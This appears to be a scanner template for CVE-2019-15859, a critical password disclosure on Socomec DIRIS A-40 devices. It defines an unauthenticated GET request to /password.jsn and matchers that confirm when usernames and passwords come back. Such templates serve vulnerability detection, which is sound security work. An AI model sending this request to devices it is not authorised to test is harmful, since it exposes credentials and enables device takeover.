2021-04-23 13:38:16 +00:00
id : CVE-2019-15859
info :
name : Socomec DIRIS Password Disclosure
author : geeknik
description : Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the /password.jsn URI.
reference : https://seclists.org/fulldisclosure/2019/Oct/10
severity : critical
tags : cve,cve2019,disclosure,socomec,diris,iot
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2019-15859
cwe-id : CWE-200
2021-04-23 13:38:16 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/password.jsn"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "text/json"
part : header
- type : word
words :
- "username"
- "password"
part : body
condition : and
